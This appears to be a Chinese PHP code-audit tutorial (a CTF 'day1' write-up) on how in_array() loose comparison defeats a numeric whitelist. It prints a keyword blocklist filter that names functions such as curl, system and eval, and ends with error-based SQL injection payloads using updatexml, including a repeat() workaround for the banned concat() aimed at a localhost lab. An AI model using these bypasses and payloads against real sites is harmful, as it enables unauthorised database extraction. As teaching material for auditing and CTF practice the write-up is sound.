0x01 前言
偶然间看到红日团队的PHP代码审计教程,想起之前立的flag,随决定赶紧搞起来。要不以后怎么跟00后竞争呢。虽然现在PHP代码审计不吃香,但是php代码好歹能看懂,CTF中也经常遇到,挖洞也能用,所以学一手还是有作用的。
0x02 in_array() 函数
in_array :(PHP 4, PHP 5, PHP 7)
功能 :检查数组中是否存在某个值
定义 : bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )
在 $haystack 中搜索 $needle ,如果第三个参数 $strict 的值为 TRUE ,则 in_array() 函数会进行强检查,检查 $needle 的类型是否和 $haystack 中的相同。如果找到 $haystack ,则返回 TRUE,否则返回 FALSE。
该函数如果没有设定第三个ture参数的情况下,会导致一个弱比较的问题。如下图
day1题目解析
首先看一下关键代码
注入过滤函数
function stop_hack($value){
$pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
$back_list = explode("|",$pattern);
foreach($back_list as $hack){
if(preg_match("/$hack/i", $value))
die("$hack detected!");
}
return $value;
}
in_array() 函数
$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
$whitelist = range(1, $row['COUNT(*)']);
}
if (!in_array($id, $whitelist)) {
die("id $id is not in whitelist.");
}
首先先看in_array函数,这里的whitelist就是一个数字数组{1,2,3,4,5},这里的左右是检查id传入的值是不是在这个数组内,但是由于没有严格判断,所以传入的值只要已1-5数字开头就能绕过。
另外一个就是正则匹配防止注入的函数,这个函数过滤大部分常见函数,输入值发现有错误回显。
直接使用报错函数进行注入,payload:and (updatexml(1,concat(0x7e,(select user()),0x7e),1));,发现禁用了concat函数。concat函数是字符串拼接的函数,可以替换的还有repeat等。
最后payload如下
http://127.0.0.1/day1/index.php?id=1%20and%20updatexml(1,repeat((select%20flag%20from%20flag),2),1);
